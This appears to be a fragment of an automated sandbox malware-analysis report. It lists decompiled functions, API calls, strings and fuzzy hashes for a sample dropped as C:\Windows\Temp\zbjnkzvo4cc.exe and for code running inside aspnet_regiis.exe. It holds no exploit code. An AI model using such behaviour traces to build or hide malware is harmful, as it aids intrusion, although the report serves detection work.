Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction ID: aedcd4422cb6fac55acc61ec7aff51eb7a98c396ff824e379ce1e7b745fb777a
Opcode Fuzzy Hash: df3a62bae5619c0391a4dd73f1ed9280de25fa8ef6cc31c29413405a70c15383
Instruction Fuzzy Hash: A2112475980B04B6D930FFB4CC06FEF7B9CAF04748FC08815A699A6050EB66F6049761

Function 68C07B3F Relevance: 9.3, APIs: 6, Instructions: 317fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleOutputCP.KERNEL32(?,00000001,?), ref: 68C07B87
__fassign.LIBCMT ref: 68C07D6C
__fassign.LIBCMT ref: 68C07D89
WriteFile.KERNEL32(?,68C06323,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 68C07DD1
WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 68C07E11
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 68C07EB9

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: FileWrite__fassign$ConsoleErrorLastOutput
String ID:
API String ID: 1735259414-0
Opcode ID: 0e9ef23d7ffb90e463042c48cc7a58aa794722132e74e895db23d73b69b083dd
Instruction ID: 29b5b26d1dfbb0ee61333cc0a8c8cb85f9f022af936a7414236d4aa7cb62d940
Opcode Fuzzy Hash: 0e9ef23d7ffb90e463042c48cc7a58aa794722132e74e895db23d73b69b083dd
Instruction Fuzzy Hash: D7C19C75D052589FCB05CFACC8809EDFBB9BF09354F68416AE865B7341E632AD42CB60

Function 68C025E7 Relevance: 9.1, APIs: 6, Instructions: 60COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,?,68C022B5,68C013E0,68C00DF9,?,68C01031,?,00000001,?,?,00000001,?,68C10120,0000000C,68C0112A), ref: 68C025F5
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 68C02603
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 68C0261C
SetLastError.KERNEL32(00000000,68C01031,?,00000001,?,?,00000001,?,68C10120,0000000C,68C0112A,?,00000001,?), ref: 68C0266E

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: d7ce4078fb69be951b4eac7298a38b899052789e3153bcab7c518c13fe7b149a
Instruction ID: 0acc66d61030df0dc6f18ebac8c56c09687c72fc951e92555293f8e29f646412
Opcode Fuzzy Hash: d7ce4078fb69be951b4eac7298a38b899052789e3153bcab7c518c13fe7b149a
Instruction Fuzzy Hash: D201B5376187119EAA17197D6C68D5A2769EB0F7F9FA0032AE230511E0FFD388156144

Function 68C04ADF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83COMMON

Download Yara Rule

Strings

C:\Windows\Temp\zbjnkzvo4cc.exe, xrefs: 68C04AE4

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: C:\Windows\Temp\zbjnkzvo4cc.exe
API String ID: 0-1163479202
Opcode ID: 1232a5b63742a4cc7db092e54bfbba7c71891be1da13313f60372fb49be0c6b0
Instruction ID: 804929b651f46b104c191eae9ad374e890fc7fad0c62391478f698b386aad602
Opcode Fuzzy Hash: 1232a5b63742a4cc7db092e54bfbba7c71891be1da13313f60372fb49be0c6b0
Instruction Fuzzy Hash: 6C218075604905AF9B309F6DDC84E2B77ADAB213EC7904614F974E7240F732EC1187A0

Function 68C02763 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,68C02824,00000000,?,00000001,00000000,?,68C0289B,00000001,FlsFree,68C0BD3C,FlsFree,00000000), ref: 68C027F3

Strings

api-ms-, xrefs: 68C027B3

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-
API String ID: 3664257935-2084034818
Opcode ID: 73a7c6f0f9dd5f21632894ac029bf937b7b6361475ebcd86366a9331b1f23d19
Instruction ID: e1c5926610bef2ba99efd87fb39179659047de8ab54fe7b02e4ee77033f5c872
Opcode Fuzzy Hash: 73a7c6f0f9dd5f21632894ac029bf937b7b6361475ebcd86366a9331b1f23d19
Instruction Fuzzy Hash: 6511C635A45629EBDF238A6CDC54B4D33B5BF0A7E4F620111E920F7281F772E90186E1

Function 68C02E1A Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,68C02DCC,?,?,68C02D94,?,00000001,?), ref: 68C02E2F
GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 68C02E42
FreeLibrary.KERNEL32(00000000,?,?,68C02DCC,?,?,68C02D94,?,00000001,?), ref: 68C02E65

Strings

CorExitProcess, xrefs: 68C02E3A
mscoree.dll, xrefs: 68C02E28

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: b3ae170599ff8c6395bcaf7fe37ab98f83e222cf852ae3236057a44d1b716ded
Instruction ID: f23f64d9df5ea4c71eb70851020876cefe7f88e8d027dbb0c2c0ac9bc8169439
Opcode Fuzzy Hash: b3ae170599ff8c6395bcaf7fe37ab98f83e222cf852ae3236057a44d1b716ded
Instruction Fuzzy Hash: 31F05830541219FBDF12DB54CD19B9E7A79EB046DAF610068A534B2250EB32CE01DB90

Function 68C07437 Relevance: 7.7, APIs: 5, Instructions: 199COMMON

Download Yara Rule

APIs

__alloca_probe_16.LIBCMT ref: 68C074BB
__alloca_probe_16.LIBCMT ref: 68C07581
__freea.LIBCMT ref: 68C075ED

Part of subcall function 68C065EC: HeapAlloc.KERNEL32(00000000,68C06323,68C06323,?,68C05023,00000220,?,68C06323,?,?,?,?,68C08441,00000001,?,?), ref: 68C0661E

__freea.LIBCMT ref: 68C075F6
__freea.LIBCMT ref: 68C07619

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: __freea$__alloca_probe_16$AllocHeap
String ID:
API String ID: 1096550386-0
Opcode ID: 85dd169ec2b081e29028fc47e67e73a29f93c85af7c8d4015008e8e4510575c8
Instruction ID: eb01489a2910a5dbdff08b50f14dd65d51d78863fadcca67b8c423d9532d3854
Opcode Fuzzy Hash: 85dd169ec2b081e29028fc47e67e73a29f93c85af7c8d4015008e8e4510575c8
Instruction Fuzzy Hash: 1D51B372500216AFEF198E9CCC40EFB3AB9EB457D4F914529F924AB140F733DD11AA60

Function 68C08985 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 68C0899D

Part of subcall function 68C04273: HeapFree.KERNEL32(00000000,00000000,?,68C034AC), ref: 68C04289
Part of subcall function 68C04273: GetLastError.KERNEL32(?,?,68C034AC), ref: 68C0429B

_free.LIBCMT ref: 68C089AF
_free.LIBCMT ref: 68C089C1
_free.LIBCMT ref: 68C089D3
_free.LIBCMT ref: 68C089E5

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: cb0e0bfe1baf80e3d322acdf7dc16c9b2979c70af2bc934185c1426239bf51ce
Instruction ID: 9c1a7af18f684459deb926159b5366e78beb55f303cb233a48e4f5a49063f550
Opcode Fuzzy Hash: cb0e0bfe1baf80e3d322acdf7dc16c9b2979c70af2bc934185c1426239bf51ce
Instruction Fuzzy Hash: 54F0FF319446045BCE20EEADE885C3B77E9EB057A47904815F475F7500E732F9C19AE9

Function 68C04377 Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 68C04999: _free.LIBCMT ref: 68C049A7

Part of subcall function 68C0556D: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,00000000,00000000,?,68C075E3,?,00000000,00000000), ref: 68C05619

GetLastError.KERNEL32 ref: 68C043DF
__dosmaperr.LIBCMT ref: 68C043E6
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 68C04425
__dosmaperr.LIBCMT ref: 68C0442C

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 155573919d901a6909036a6401ef5d9f2d1df46403bedaaa9ed19295698ecd25
Instruction ID: 558f0b0afcb30057c775e7483bfa6c7e3436a43910b4e77a8295008b65069509
Opcode Fuzzy Hash: 155573919d901a6909036a6401ef5d9f2d1df46403bedaaa9ed19295698ecd25
Instruction Fuzzy Hash: A821B671604615AF9B309FAE8C8492B77ADFF613EC7808528F974A7640F732EC418B90

Function 68C03C77 Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,68C07F87,?,00000001,68C06394,?,68C08441,00000001,?,?,?,68C06323,?,00000000), ref: 68C03C7C
_free.LIBCMT ref: 68C03CD9
_free.LIBCMT ref: 68C03D0F
SetLastError.KERNEL32(00000000,00000013,000000FF,?,68C08441,00000001,?,?,?,68C06323,?,00000000,00000000,68C10360,0000002C,68C06394), ref: 68C03D1A

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 29de32d98fedf0e4fcd568137d5d5354038b4dae837c23037453d0f7b3277ecd
Instruction ID: 0fd1bb96fc0004aa95d3df4f99c668974be53d79a2acd90a60e72513a4d64921
Opcode Fuzzy Hash: 29de32d98fedf0e4fcd568137d5d5354038b4dae837c23037453d0f7b3277ecd
Instruction Fuzzy Hash: BE11E7392146016FDE0256BD4C88E3F2669AB827FDBE10224F230E31C1FFA3C9118111

Function 68C03DCE Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,00000001,68C04208,68C04299,?,?,68C034AC), ref: 68C03DD3
_free.LIBCMT ref: 68C03E30
_free.LIBCMT ref: 68C03E66
SetLastError.KERNEL32(00000000,00000013,000000FF,?,00000001,68C04208,68C04299,?,?,68C034AC), ref: 68C03E71

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 81d349b66a01ae83df18ac4b127eec3caf5fe0ffc5eecf207171383353caaf48
Instruction ID: 56287a5c53b4a22e03645e779636c67c301ce35bee6014d48502afa9772b906a
Opcode Fuzzy Hash: 81d349b66a01ae83df18ac4b127eec3caf5fe0ffc5eecf207171383353caaf48
Instruction Fuzzy Hash: 341186362282516FDA0259BD5CC8E3F266AABC27F9FE10224F634A71D1FFA3CD114111

Function 68C091D6 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,?,68C08C30,?,00000001,?,00000001,?,68C07F16,?,?,00000001), ref: 68C091ED
GetLastError.KERNEL32(?,68C08C30,?,00000001,?,00000001,?,68C07F16,?,?,00000001,?,00000001,?,68C08462,68C06323), ref: 68C091F9

Part of subcall function 68C091BF: CloseHandle.KERNEL32(FFFFFFFE,68C09209,?,68C08C30,?,00000001,?,00000001,?,68C07F16,?,?,00000001,?,00000001), ref: 68C091CF

___initconout.LIBCMT ref: 68C09209

Part of subcall function 68C09181: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,68C091B0,68C08C1D,00000001,?,68C07F16,?,?,00000001,?), ref: 68C09194

WriteConsoleW.KERNEL32(?,?,00000000,00000000,?,68C08C30,?,00000001,?,00000001,?,68C07F16,?,?,00000001,?), ref: 68C0921E

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 0a22f51aa35f36b70fcf6da662de61818caa1c38153a513e1254aa41670a86b5
Instruction ID: 81b4338c3df50c27a3e39e79df7b7e76b11c721558974a8de59e53fd49675fc4
Opcode Fuzzy Hash: 0a22f51aa35f36b70fcf6da662de61818caa1c38153a513e1254aa41670a86b5
Instruction Fuzzy Hash: 56F0AC36500115BBCF125F96DC08A9E7F76EB4A3E5F554014FB28A5220D633C961DB91

Function 68C035A4 Relevance: 6.0, APIs: 4, Instructions: 19COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 68C035AD

Part of subcall function 68C04273: HeapFree.KERNEL32(00000000,00000000,?,68C034AC), ref: 68C04289
Part of subcall function 68C04273: GetLastError.KERNEL32(?,?,68C034AC), ref: 68C0429B

_free.LIBCMT ref: 68C035C0
_free.LIBCMT ref: 68C035D1
_free.LIBCMT ref: 68C035E2

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 24c684a475c44aaa017d36b1641be24fc1fd7a61da4506f112353c850a9b3a8a
Instruction ID: e80663a099993e2644f47fc8c6cbe4ec4adace9c110f65e81b60e8833224ff52
Opcode Fuzzy Hash: 24c684a475c44aaa017d36b1641be24fc1fd7a61da4506f112353c850a9b3a8a
Instruction Fuzzy Hash: 8AE04F78810160DA8F219F2FE84043EBE31BB1B6483400527E80432214D73696D2EFC9

Function 68C02EA8 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\Temp\zbjnkzvo4cc.exe, xrefs: 68C02EEB, 68C02EF2, 68C02F28

Memory Dump Source

Source File: 00000018.00000002.2248504311.0000000068BF1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 68BF0000, based on PE: true

Associated: 00000018.00000002.2248471350.0000000068BF0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248715259.0000000068C0B000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: C:\Windows\Temp\zbjnkzvo4cc.exe
API String ID: 0-1163479202
Opcode ID: 539cc638a22e2da28b3a6a0ac47b7ed2b8e9c8a32901d02853ae62d0091e99df
Instruction ID: cfacb0916c46e26093cd116cc7d68a5a6ba4383c7bc6d74488e4c69aaee07bcb
Opcode Fuzzy Hash: 539cc638a22e2da28b3a6a0ac47b7ed2b8e9c8a32901d02853ae62d0091e99df
Instruction Fuzzy Hash: A5417575A04224ABDB12CF9DC8909AEBBF9EF9D3D4F900066E514E7344F7729A41CB50

Function 68C197B0 Relevance: 5.3, Strings: 4, Instructions: 297COMMON

Download Yara Rule

Strings

4, xrefs: 68C198D2
r}, xrefs: 68C1983B
^tpr, xrefs: 68C19A2E
b, xrefs: 68C19949

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: 4$^tpr$b$r}
API String ID: 0-605887794
Opcode ID: f8d187cc6615d5e3622de574f329ab65def0a2f663cee4735a8cee40715f13af
Instruction ID: 559a52c884beb4cd1e11d9dcf4956d894782d7ccd4873d8efb6552448bd7070c
Opcode Fuzzy Hash: f8d187cc6615d5e3622de574f329ab65def0a2f663cee4735a8cee40715f13af
Instruction Fuzzy Hash: 1981D43110C3D58AD711CF29849436BBFE1AF92344F5889AEE4E59B282D73AC50FD762

Function 68C1B749 Relevance: 5.1, Strings: 4, Instructions: 85COMMON

Download Yara Rule

Strings

a9, xrefs: 68C1B8BC
ge, xrefs: 68C1B790
ph, xrefs: 68C1B8D0
uq, xrefs: 68C1B8DA

Memory Dump Source

Source File: 00000018.00000002.2248780989.0000000068C11000.00000004.00000001.01000000.0000000A.sdmp, Offset: 68C11000, based on PE: true

Associated: 00000018.00000002.2249389363.0000000068C62000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_24_2_68bf0000_zbjnkzvo4cc.jbxd

Similarity

API ID:
String ID: a9$ph$uq$ge
API String ID: 0-4278815132
Opcode ID: 02463ad8e39931774826c245cce29b01549f7e90fdaa6f8ebd3edf1248d1b480
Instruction ID: 8a6d90fa9221d770a85577ae20d116af413465e70b51207ec916fdb47972ba46
Opcode Fuzzy Hash: 02463ad8e39931774826c245cce29b01549f7e90fdaa6f8ebd3edf1248d1b480
Instruction Fuzzy Hash: A65199B8045B858FD364CF229591B8BBBF1FB25704F108A1CD1EB1B664CB706045CF96

Analysis Process: aspnet_regiis.exePID: 8084, Parent PID: 8012COMMON

Execution Graph

Execution Coverage:	10.7%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	25.2%
Total number of Nodes:	298
Total number of Limit Nodes:	30

Executed Functions

Function 025DAAE0 Relevance: 33.7, APIs: 11, Strings: 8, Instructions: 429
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CoCreateInstance.OLE32(025E5678,00000000,00000001,025E5668,00000000), ref: 025DABDC
SysAllocString.OLEAUT32 ref: 025DAC48
CoSetProxyBlanket.COMBASE(899A8F55,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 025DAC91
SysAllocString.OLEAUT32 ref: 025DAD0B
SysAllocString.OLEAUT32 ref: 025DAD95
VariantInit.OLEAUT32(?), ref: 025DAE00
VariantClear.OLEAUT32(?), ref: 025DAF67
SysFreeString.OLEAUT32(?), ref: 025DAF8B
SysFreeString.OLEAUT32(?), ref: 025DAF91
SysFreeString.OLEAUT32(?), ref: 025DAFA5
GetVolumeInformationW.KERNELBASE(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 025DAFD6

Strings

e], xrefs: 025DAAFE
HI, xrefs: 025DAD74
Q:, xrefs: 025DAB0E
dW, xrefs: 025DAB06
2zS, xrefs: 025DACB8
C, xrefs: 025DAB8E
R[, xrefs: 025DAB16
\, xrefs: 025DAB96

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID: String$AllocFree$Variant$BlanketClearCreateInformationInitInstanceProxyVolume
String ID: 2zS$C$HI$Q:$R[$\$dW$e]
API String ID: 2573436264-720759029
Opcode ID: 77bada706d00b1720ad9a60bd1f826ee79c21f7a8d83f1da96ca4d6a741c8b9c
Instruction ID: 23d7de53ca141eacec6164488e98b59add4d87f3f1b71a633cedd707dad4dd74
Opcode Fuzzy Hash: 77bada706d00b1720ad9a60bd1f826ee79c21f7a8d83f1da96ca4d6a741c8b9c
Instruction Fuzzy Hash: C2E1FCB5A083419FE7208F28CC85B1BBBE5FB85718F04892CF6919B280D7B4D905CB96

Function 025BA4DA Relevance: 13.5, APIs: 1, Strings: 6, Instructions: 1286COMMON

Download Yara Rule

Strings

xO, xrefs: 025BA53E
, xrefs: 025BB404
qt, xrefs: 025BB20B
<=, xrefs: 025BB28F
2, xrefs: 025BB075
).)(, xrefs: 025BAE15

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130383284.00000000025E4000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130480960.00000000025E7000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 0000001A.00000002.2130522280.00000000025F9000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_25a0000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: $).)($2$<=$qt$xO
API String ID: 0-2945988728
Opcode ID: 32959cd4a59c81fb8301569ca6fa64d5b4aa46bb40b6269bcc64a8200663dfb0
Instruction ID: 98a4f30c6d6e5597275e12c3f1023bfa61415e0829c1f8ad80e24c67f43bdd99
Opcode Fuzzy Hash: 32959cd4a59c81fb8301569ca6fa64d5b4aa46bb40b6269bcc64a8200663dfb0
Instruction Fuzzy Hash: 2192CFB1909381CBD7358F28D8A57EBBBE1FF85314F14492CD4C98B291EB349915CB8A

Function 025C6618 Relevance: 10.9, APIs: 1, Strings: 5, Instructions: 415
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

wu, xrefs: 025C6976
\], xrefs: 025C6B2C
sq, xrefs: 025C6A67, 025C6A6B
I=[;, xrefs: 025C6AEC
k8i, xrefs: 025C697E

Memory Dump Source

Source File: 0000001A.00000002.2130307895.00000000025A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 025A0000, based on PE: true

Associated: 0000001A.00000002.2130193945.00000000025A0000.00000040.00000400.00020000.00000000.sdmpDownload File
